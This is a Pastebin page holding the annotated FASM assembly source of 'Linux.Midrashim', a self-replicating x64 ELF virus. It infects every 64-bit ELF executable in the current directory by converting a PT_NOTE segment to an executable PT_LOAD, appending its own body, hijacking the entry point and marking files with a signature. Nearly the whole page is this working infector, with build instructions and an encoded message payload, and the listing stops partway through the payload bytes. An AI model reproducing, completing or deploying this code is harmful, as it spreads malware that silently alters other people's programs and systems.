Advertisement
FlyFar

Linux/Midrashim.A - x64 ELF infector - Source Code

Jul 8th, 2023
1,451
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 30.32 KB | Cybersecurity | 0 0
  1. ; Linux.Midrashim
  2. ; Written by TMZ
  3. ;
  4. ; Finished on 30.05.2020
  5. ; Released on 07.11.2020
  6. ; The release was delayed because I was trying to code a fancy 90's style payload and due to lack of time, I'll leave this to another project.
  7. ; This is my first full assembly virus and should be assembled with FASM x64 (tested with version 1.73.25 but it should work with more recent too).
  8. ;   - relies on PT_NOTE -> PT_LOAD infection technique and should work on regular x64 ELF executables (position independent or not).
  9. ;   - should use mmap but instead it uses pread and pwrite (due to lazyness).
  10. ;   - stores stuff on memory buffer (r15 register).
  11. ;   - infects current directory (non recursively).
  12. ;   - has several parts that could have improved, like detecting first virus execution with a better approach.
  13. ;
  14. ; Assemble with:
  15. ;       $ fasm Linux.Midrashim.asm
  16. ;
  17. ; Payload (non destructive) is a quote from a song and it's encoded for no reason whatsoever.
  18. ;
  19. ; A big thanks for those who keeps the VX scene alive!
  20. ; Feel free to email me: tmz@null.net || tmz@syscall.sh || thomazi@linux.com
  21. ; @guitmz || @TMZvx
  22. ; https://www.guitmz.com
  23. ; https://syscall.sh
  24. ;
  25. ; Use at your own risk, I'm not responsible for any damages that this may cause, do not spread it into the wild!
  26. ;
  27. ; References:
  28. ; https://www.guitmz.com/linux-midrashim-elf-virus/
  29. ; https://www.symbolcrash.com/2019/03/27/pt_note-to-pt_load-injection-in-elf
  30. ; https://www.wikidata.org/wiki/Q6041496
  31. ; https://legacyofkain.fandom.com/wiki/Ozar_Midrashim
  32. ; https://en.wikipedia.org/wiki/Don%27t_Be_Afraid_(album)
  33. ;
  34. ; Stack buffer:
  35. ; r15 + 0 = stack buffer (10000 bytes) = stat
  36. ; r15 + 48 = stat.st_size
  37. ; r15 + 144 = ehdr
  38. ; r15 + 148 = ehdr.class
  39. ; r15 + 152 = ehdr.pad
  40. ; r15 + 168 = ehdr.entry
  41. ; r15 + 176 = ehdr.phoff
  42. ; r15 + 198 = ehdr.phentsize
  43. ; r15 + 200 = ehdr.phnum
  44. ; r15 + 208 = phdr = phdr.type
  45. ; r15 + 212 = phdr.flags
  46. ; r15 + 216 = phdr.offset
  47. ; r15 + 224 = phdr.vaddr
  48. ; r15 + 232 = phdr.paddr
  49. ; r15 + 240 = phdr.filesz
  50. ; r15 + 248 = phdr.memsz
  51. ; r15 + 256 = phdr.align
  52. ; r15 + 300 = jmp rel
  53. ; r15 + 350 = directory size
  54. ; r15 + 400 = dirent = dirent.d_ino
  55. ; r15 + 416 = dirent.d_reclen
  56. ; r15 + 418 = dirent.d_type
  57. ; r15 + 419 = dirent.d_name
  58. ; r15 + 3000 = first run control flag
  59. ; r15 + 3001 = decoded payload
  60.  
  61. format ELF64 executable 3
  62.  
  63. SYS_EXIT        = 60
  64. SYS_OPEN        = 2
  65. SYS_CLOSE       = 3
  66. SYS_WRITE       = 1
  67. SYS_READ        = 0
  68. SYS_EXECVE      = 59
  69. SYS_GETDENTS64  = 217
  70. SYS_FSTAT       = 5
  71. SYS_LSEEK       = 8
  72. SYS_PREAD64     = 17
  73. SYS_PWRITE64    = 18
  74. SYS_SYNC        = 162
  75. STDOUT          = 1
  76. EHDR_SIZE       = 64
  77. ELFCLASS64      = 2
  78. O_RDONLY        = 0
  79. O_RDWR          = 2
  80. SEEK_END        = 2
  81. DIRENT_BUFSIZE  = 1024
  82. MFD_CLOEXEC     = 1
  83. DT_REG          = 8
  84. PT_LOAD         = 1
  85. PT_NOTE         = 4
  86. PF_X            = 1
  87. PF_R            = 4
  88. FIRST_RUN       = 1
  89. V_SIZE          = 2631
  90.  
  91. segment readable executable
  92. entry v_start
  93.  
  94. v_start:
  95.     mov r14, [rsp + 8]                                          ; saving argv0 to r14
  96.     push rdx
  97.     push rsp
  98.     sub rsp, 5000                                               ; reserving 5000 bytes
  99.     mov r15, rsp                                                ; r15 has the reserved stack buffer address
  100.  
  101.     check_first_run:
  102.         mov rdi,  r14                                           ; argv0 to rdi
  103.         mov rsi, O_RDONLY
  104.         xor rdx, rdx                                            ; not using any flags
  105.         mov rax, SYS_OPEN
  106.         syscall                                                 ; rax contains the argv0 fd
  107.  
  108.         mov rdi, rax
  109.         mov rsi, r15                                            ; rsi = r15 = stack buffer address
  110.         mov rax, SYS_FSTAT                                      ; getting argv0 size in bytes
  111.         syscall                                                 ; stat.st_size = [r15 + 48]
  112.        
  113.         cmp qword [r15 + 48], V_SIZE                            ; compare argv0 size with virus size
  114.         jg load_dir                                             ; if greater, not first run, continue infecting without setting control flag
  115.        
  116.         mov byte [r15 + 3000], FIRST_RUN                        ; set the control flag to [r15 + 3000] to represent virus first execution, not a great approach but will do for now
  117.  
  118.     load_dir:
  119.         push "."                                                ; pushing "." to stack (rsp)
  120.         mov rdi, rsp                                            ; moving "." to rdi
  121.         mov rsi, O_RDONLY
  122.         xor rdx, rdx                                            ; not using any flags
  123.         mov rax, SYS_OPEN
  124.         syscall                                                 ; rax contains the fd
  125.        
  126.         pop rdi
  127.         cmp rax, 0                                              ; if can't open file, exit now
  128.         jbe v_stop
  129.  
  130.         mov rdi, rax                                            ; move fd to rdi
  131.         lea rsi, [r15 + 400]                                    ; rsi = dirent = [r15 + 400]
  132.         mov rdx, DIRENT_BUFSIZE                                 ; buffer with maximum directory size
  133.         mov rax, SYS_GETDENTS64
  134.         syscall                                                 ; dirent contains the directory entries
  135.  
  136.         test rax, rax                                           ; check directory list was successful
  137.         js v_stop                                               ; if negative code is returned, I failed and should exit
  138.  
  139.         mov qword [r15 + 350], rax                              ; [r15 + 350] now holds directory size
  140.  
  141.         mov rax, SYS_CLOSE                                      ; close source fd in rdi
  142.         syscall
  143.  
  144.         xor rcx, rcx                                            ; will be the position in the directory entries
  145.  
  146.     file_loop:
  147.         push rcx                                                ; preserving rcx (important!!!)
  148.         cmp byte [rcx + r15 + 418], DT_REG                      ; check if it's a regular file dirent.d_type = [r15 + 418]
  149.         jne .continue                                           ; if not, proceed to next file
  150.  
  151.         .open_target_file:
  152.             lea rdi, [rcx + r15 + 419]                          ; dirent.d_name = [r15 + 419]
  153.             mov rsi, O_RDWR
  154.             xor rdx, rdx                                        ; not using any flags
  155.             mov rax, SYS_OPEN
  156.             syscall
  157.  
  158.             cmp rax, 0                                          ; if can't open file, exit now
  159.             jbe .continue
  160.             mov r9, rax                                         ; r9 contains target fd
  161.  
  162.         .read_ehdr:
  163.             mov rdi, r9                                         ; r9 contains fd
  164.             lea rsi, [r15 + 144]                                ; rsi = ehdr = [r15 + 144]
  165.             mov rdx, EHDR_SIZE                                  ; ehdr.size
  166.             mov r10, 0                                          ; read at offset 0
  167.             mov rax, SYS_PREAD64
  168.             syscall
  169.  
  170.         .is_elf:
  171.             cmp dword [r15 + 144], 0x464c457f                   ; 0x464c457f means .ELF (little-endian)
  172.             jnz .close_file                                     ; not an ELF binary, close and continue to next file if any
  173.        
  174.         .is_64:
  175.             cmp byte [r15 + 148], ELFCLASS64                    ; check if target ELF is 64bit
  176.             jne .close_file                                     ; skipt it if not
  177.  
  178.         .is_infected:
  179.             cmp dword [r15 + 152], 0x005a4d54                   ; check signature in [r15 + 152] ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size)
  180.             jz .close_file                                      ; already infected, close and continue to next file if any
  181.  
  182.             mov r8, [r15 + 176]                                 ; r8 now holds ehdr.phoff from [r15 + 176]
  183.             xor rbx, rbx                                        ; initializing phdr loop counter in rbx
  184.             xor r14, r14                                        ; r14 will hold phdr file offset
  185.  
  186.         .loop_phdr:
  187.             mov rdi, r9                                         ; r9 contains fd
  188.             lea rsi, [r15 + 208]                                ; rsi = phdr = [r15 + 208]
  189.             mov dx, word [r15 + 198]                            ; ehdr.phentsize is at [r15 + 198]
  190.             mov r10, r8                                         ; read at ehdr.phoff from r8 (incrementing ehdr.phentsize each loop iteraction)
  191.             mov rax, SYS_PREAD64
  192.             syscall
  193.  
  194.             cmp byte [r15 + 208], PT_NOTE                       ; check if phdr.type in [r15 + 208] is PT_NOTE (4)
  195.             jz .infect                                          ; if yes, jackpot, start infecting
  196.  
  197.             inc rbx                                             ; if not, increase rbx counter
  198.             cmp bx, word [r15 + 200]                            ; check if we looped through all phdrs already (ehdr.phnum = [r15 + 200])
  199.             jge .close_file                                     ; exit if no valid phdr for infection was found
  200.  
  201.             add r8w, word [r15 + 198]                           ; otherwise, add current ehdr.phentsize from [r15 + 198] into r8w
  202.             jnz .loop_phdr                                      ; read next phdr
  203.  
  204.         .infect:
  205.             .get_target_phdr_file_offset:
  206.                 mov ax, bx                                      ; loading phdr loop counter bx to ax
  207.                 mov dx, word [r15 + 198]                        ; loading ehdr.phentsize from [r15 + 198] to dx
  208.                 imul dx                                         ; bx * ehdr.phentsize
  209.                 mov r14w, ax
  210.                 add r14, [r15 + 176]                            ; r14 = ehdr.phoff + (bx * ehdr.phentsize)
  211.  
  212.             .file_info:
  213.                 mov rdi, r9
  214.                 mov rsi, r15                                    ; rsi = r15 = stack buffer address
  215.                 mov rax, SYS_FSTAT
  216.                 syscall                                         ; stat.st_size = [r15 + 48]
  217.  
  218.             .append_virus:
  219.                 ; getting target EOF
  220.                 mov rdi, r9                                     ; r9 contains fd
  221.                 mov rsi, 0                                      ; seek offset 0
  222.                 mov rdx, SEEK_END
  223.                 mov rax, SYS_LSEEK
  224.                 syscall                                         ; getting target EOF offset in rax
  225.                 push rax                                        ; saving target EOF
  226.  
  227.                 call .delta                                     ; the age old trick
  228.                 .delta:
  229.                     pop rbp
  230.                     sub rbp, .delta
  231.  
  232.                 ; writing virus body to EOF
  233.                 mov rdi, r9                                     ; r9 contains fd
  234.                 lea rsi, [rbp + v_start]                        ; loading v_start address in rsi
  235.                 mov rdx, v_stop - v_start                       ; virus size
  236.                 mov r10, rax                                    ; rax contains target EOF offset from previous syscall
  237.                 mov rax, SYS_PWRITE64
  238.                 syscall
  239.  
  240.                 cmp rax, 0
  241.                 jbe .close_file
  242.  
  243.             .patch_phdr:
  244.                 mov dword [r15 + 208], PT_LOAD                  ; change phdr type in [r15 + 208] from PT_NOTE to PT_LOAD (1)
  245.                 mov dword [r15 + 212], PF_R or PF_X             ; change phdr.flags in [r15 + 212] to PF_X (1) | PF_R (4)
  246.                 pop rax                                         ; restoring target EOF offeset into rax
  247.                 mov [r15 + 216], rax                            ; phdr.offset [r15 + 216] = target EOF offset
  248.                 mov r13, [r15 + 48]                             ; storing target stat.st_size from [r15 + 48] in r13
  249.                 add r13, 0xc000000                              ; adding 0xc000000 to target file size
  250.                 mov [r15 + 224], r13                            ; changing phdr.vaddr in [r15 + 224] to new one in r13 (stat.st_size + 0xc000000)
  251.                 mov qword [r15 + 256], 0x200000                 ; set phdr.align in [r15 + 256] to 2mb
  252.                 add qword [r15 + 240], v_stop - v_start + 5     ; add virus size to phdr.filesz in [r15 + 240] + 5 for the jmp to original ehdr.entry
  253.                 add qword [r15 + 248], v_stop - v_start + 5     ; add virus size to phdr.memsz in [r15 + 248] + 5 for the jmp to original ehdr.entry
  254.  
  255.                 ; writing patched phdr
  256.                 mov rdi, r9                                     ; r9 contains fd
  257.                 mov rsi, r15                                    ; rsi = r15 = stack buffer address
  258.                 lea rsi, [r15 + 208]                            ; rsi = phdr = [r15 + 208]
  259.                 mov dx, word [r15 + 198]                        ; ehdr.phentsize from [r15 + 198]
  260.                 mov r10, r14                                    ; phdr from [r15 + 208]
  261.                 mov rax, SYS_PWRITE64
  262.                 syscall
  263.  
  264.                 cmp rax, 0
  265.                 jbe .close_file
  266.  
  267.             .patch_ehdr:
  268.                 ; patching ehdr
  269.                 mov r14, [r15 + 168]                            ; storing target original ehdr.entry from [r15 + 168] in r14
  270.                 mov [r15 + 168], r13                            ; set ehdr.entry in [r15 + 168] to r13 (phdr.vaddr)
  271.                 mov r13, 0x005a4d54                             ; loading virus signature into r13 (TMZ in little-endian)
  272.                 mov [r15 + 152], r13                            ; adding the virus signature to ehdr.pad in [r15 + 152]
  273.  
  274.                 ; writing patched ehdr
  275.                 mov rdi, r9                                     ; r9 contains fd
  276.                 lea rsi, [r15 + 144]                            ; rsi = ehdr = [r15 + 144]
  277.                 mov rdx, EHDR_SIZE                              ; ehdr.size
  278.                 mov r10, 0                                      ; ehdr.offset
  279.                 mov rax, SYS_PWRITE64
  280.                 syscall
  281.  
  282.                 cmp rax, 0
  283.                 jbe .close_file
  284.  
  285.             .write_patched_jmp:
  286.                 ; getting target new EOF
  287.                 mov rdi, r9                                     ; r9 contains fd
  288.                 mov rsi, 0                                      ; seek offset 0
  289.                 mov rdx, SEEK_END
  290.                 mov rax, SYS_LSEEK
  291.                 syscall                                         ; getting target EOF offset in rax
  292.  
  293.                 ; creating patched jmp
  294.                 mov rdx, [r15 + 224]                            ; rdx = phdr.vaddr
  295.                 add rdx, 5
  296.                 sub r14, rdx
  297.                 sub r14, v_stop - v_start
  298.                 mov byte [r15 + 300 ], 0xe9
  299.                 mov dword [r15 + 301], r14d
  300.  
  301.                 ; writing patched jmp to EOF
  302.                 mov rdi, r9                                     ; r9 contains fd
  303.                 lea rsi, [r15 + 300]                            ; rsi = patched jmp in stack buffer = [r15 + 208]
  304.                 mov rdx, 5                                      ; size of jmp rel
  305.                 mov r10, rax                                    ; mov rax to r10 = new target EOF
  306.                 mov rax, SYS_PWRITE64
  307.                 syscall
  308.  
  309.                 cmp rax, 0
  310.                 jbe .close_file
  311.  
  312.                 mov rax, SYS_SYNC                               ; commiting filesystem caches to disk
  313.                 syscall
  314.  
  315.         .close_file:
  316.             mov rax, SYS_CLOSE                                  ; close source fd in rdi
  317.             syscall
  318.  
  319.         .continue:
  320.             pop rcx
  321.             add cx, word [rcx + r15 + 416]                      ; adding directory record lenght to cx (lower rcx, for word)
  322.             cmp rcx, qword [r15 + 350]                          ; comparing rcx counter with [r15 + 350] (directory records total size)
  323.             jne file_loop                                       ; if counter is not the same, continue loop. Exit virus otherwise
  324.  
  325.     cmp byte [r15 + 3000], FIRST_RUN                            ; checking if custom control flag we set earlier indicates virus first execution
  326.     jnz infected_run                                            ; if control flag != 1, it should be running from an infected file, use normal payload
  327.         call show_msg                                           ; if control flag == 1, assume virus is being executed for the first time and display a different message
  328.         info_msg:
  329.             db 'Midrashim by TMZ (c) 2020', 0xa                 ; not the nicest approach like I mentioned before but quick to implement
  330.             info_len = $-info_msg
  331.         show_msg:            
  332.             pop rsi                                             ; info_msg address to rsi
  333.             mov rax, SYS_WRITE
  334.             mov rdi, STDOUT                                     ; display payload
  335.             mov rdx, info_len
  336.             syscall
  337.             jmp cleanup                                         ; cleanup and exit
  338.  
  339.     infected_run:
  340.         ; 1337 encoded payload, very hax0r
  341.         call payload
  342.         msg:
  343.             ; payload first part
  344.             db 0x59, 0x7c, 0x95, 0x95, 0x57, 0x9e, 0x9d, 0x57
  345.             db 0xa3, 0x9f, 0x92, 0x57, 0x93, 0x9e, 0xa8, 0xa3
  346.             db 0x96, 0x9d, 0x98, 0x92, 0x57, 0x7e, 0x57, 0x98
  347.             db 0x96, 0x9d, 0x57, 0xa8, 0x92, 0x92, 0x57, 0x96
  348.             db 0x57, 0x9f, 0xa2, 0x94, 0x92, 0x57, 0x9f, 0x9c
  349.             db 0x9b, 0x9c, 0x94, 0xa9, 0x96, 0xa7, 0x9f, 0x9e
  350.             db 0x98, 0x57, 0x89, 0x9c, 0x9d, 0x96, 0x9b, 0x93
  351.             db 0x57, 0x7a, 0x98, 0x73, 0x9c, 0x9d, 0x96, 0x9b
  352.             db 0x93, 0x57, 0xa4, 0x96, 0x9b, 0xa0, 0x9e, 0x9d
  353.             db 0x94, 0x57, 0x99, 0x92, 0xa3, 0xa4, 0x92, 0x92
  354.             db 0x9d, 0x57, 0xa3, 0x9f, 0x92, 0x57, 0x94, 0xa9
  355.             db 0x96, 0x9e, 0x9d, 0x57, 0x92, 0x9b, 0x92, 0xa5
  356.             db 0x96, 0xa3, 0x9c, 0xa9, 0xa8, 0x57, 0x96, 0x9d
  357.             db 0x93, 0x57, 0xa3, 0xa9, 0x92, 0x92, 0xa8, 0x41
  358.             db 0x7c, 0x9f, 0x5b, 0x57, 0x9e, 0x95, 0x57, 0x7e
  359.             db 0x57, 0x9f, 0x96, 0x93, 0x57, 0xa3, 0x9f, 0x92
  360.             db 0x57, 0x9a, 0x9c, 0x9d, 0x92, 0xae, 0x57, 0x7e
  361.             db 0x54, 0x93, 0x57, 0x9f, 0x96, 0xa5, 0x92, 0x57
  362.             db 0x54, 0x92, 0x9a, 0x57, 0x9a, 0x96, 0xa0, 0x92
  363.             db 0x57, 0x9c, 0x9d, 0x92, 0x57, 0x9c, 0x95, 0x57
  364.             db 0xa3, 0x9f, 0x9c, 0xa8, 0x92, 0x57, 0x9a, 0x92
  365.             db 0x5b, 0x57, 0xa3, 0x9f, 0x92, 0x9d, 0x57, 0x7e
  366.             db 0x54, 0x93, 0x57, 0xa8, 0x92, 0x9d, 0x93, 0x57
  367.             db 0x9a, 0xae, 0xa8, 0x92, 0x9b, 0x95, 0x57, 0xa3
  368.             db 0x9c, 0x57, 0xa8, 0xa3, 0x96, 0x9b, 0xa0, 0x57
  369.             db 0xa3, 0x9f, 0x92, 0x57, 0x9b, 0x96, 0x9d, 0x93
  370.             db 0xa8, 0x98, 0x96, 0xa7, 0x92, 0x57, 0x96, 0x9d
  371.             db 0x93, 0x57, 0xa8, 0x98, 0x96, 0xa9, 0x92, 0x57
  372.             db 0x92, 0xa5, 0x92, 0xa9, 0xae, 0x99, 0x9c, 0x93
  373.             db 0xae, 0x41, 0x8e, 0x9c, 0xa2, 0x57, 0xa8, 0x92
  374.             db 0x92, 0x5b, 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8
  375.             db 0x92, 0x57, 0x7e, 0x57, 0x94, 0x9c, 0xa3, 0x57
  376.             db 0xa3, 0x9f, 0x9e, 0xa8, 0x57, 0xa8, 0x9c, 0xa9
  377.             db 0xa3, 0x57, 0x9c, 0x95, 0x57, 0x95, 0x9e, 0x92
  378.             db 0x9b, 0x93, 0x57, 0x99, 0x92, 0x9f, 0x9e, 0x9d
  379.             db 0x93, 0x57, 0x9a, 0x92, 0x5d, 0x57, 0x79, 0x92
  380.             db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x5d, 0x5d, 0x5d
  381.             db 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57
  382.             db 0x7e, 0x54, 0xa5, 0x92, 0x57, 0x94, 0x9c, 0xa3
  383.             db 0x57, 0xa8, 0xa7, 0x9e, 0xa0, 0x92, 0xa8, 0x41
  384.             db 0x79, 0x92, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57
  385.             db 0x7e, 0x57, 0x94, 0x9c, 0x57, 0x99, 0x92, 0xa3
  386.             db 0xa4, 0x92, 0x92, 0x9d, 0x57, 0xa3, 0x9f, 0x92
  387.             db 0x57, 0xb1, 0x9c, 0x9d, 0x92, 0xa8, 0x5b, 0x57
  388.             db 0x92, 0xa5, 0x92, 0x9d, 0x57, 0xa4, 0x9f, 0x92
  389.             db 0x9d, 0x57, 0x7e, 0x54, 0x9a, 0x57, 0x9d, 0x9c
  390.             db 0xa3, 0x57, 0xa8, 0xa2, 0xa7, 0xa7, 0x9c, 0xa8
  391.             db 0x92, 0x93, 0x57, 0xa3, 0x9c, 0x41, 0x79, 0x92
  392.             db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57, 0x7e, 0x54
  393.             db 0x9a, 0x57, 0x96, 0x57, 0xa8, 0xa2, 0xa8, 0xa7
  394.             db 0x9e, 0x98, 0x9e, 0x9c, 0xa2, 0xa8, 0x57, 0xa7
  395.             db 0x92, 0xa9, 0xa8, 0x9c, 0x9d, 0x57, 0xa9, 0x92
  396.             db 0xa7, 0x9c, 0xa9, 0xa3, 0x57, 0x41, 0x76, 0x9d
  397.             db 0x93, 0x57, 0x9e, 0xa3, 0x54, 0xa8, 0x57, 0xa3
  398.             db 0x9e, 0x9a, 0x92, 0x57, 0xa3, 0x9c, 0x57, 0x94
  399.             db 0x9c, 0x57, 0xa8, 0x9f, 0x9c, 0xa7, 0xa7, 0x9e
  400.             db 0x9d, 0x94, 0x5d, 0x59, 0x41, 0x37, 0x41
  401.             ; payload second part
  402.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  403.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57
  404.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  405.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
  406.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  407.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  408.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  409.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
  410.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  411.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  412.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  413.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  414.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  415.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  416.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  417.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  418.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
  419.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  420.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  421.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  422.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  423.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  424.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
  425.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  426.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  427.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  428.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
  429.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  430.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
  431.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  432.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
  433.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  434.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  435.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
  436.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57
  437.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  438.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
  439.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  440.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  441.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57
  442.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
  443.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  444.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x58
  445.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  446.             db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  447.             db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
  448.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
  449.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  450.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
  451.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  452.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
  453.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  454.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
  455.             db 0x55, 0x55, 0x58, 0x57, 0x57, 0x57, 0x57, 0x41
  456.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
  457.             db 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57, 0x57
  458.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
  459.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  460.             db 0x57, 0x57, 0x52, 0x55, 0x55, 0x55, 0x55, 0x55
  461.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  462.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
  463.             db 0x55, 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57
  464.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x5d
  465.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  466.             db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57
  467.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  468.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  469.             db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
  470.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  471.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  472.             db 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
  473.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  474.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  475.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
  476.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  477.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
  478.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
  479.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  480.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  481.             db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
  482.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
  483.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55
  484.             db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
  485.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  486.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  487.             db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
  488.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
  489.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
  490.             db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
  491.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  492.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  493.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  494.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
  495.             db 0x55, 0x55, 0x52, 0x57, 0x57, 0x57, 0x57, 0x57
  496.             db 0x57, 0x57, 0x61, 0x55, 0x55, 0x57, 0x57, 0x57
  497.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  498.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  499.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  500.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55
  501.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  502.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
  503.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
  504.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
  505.             db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
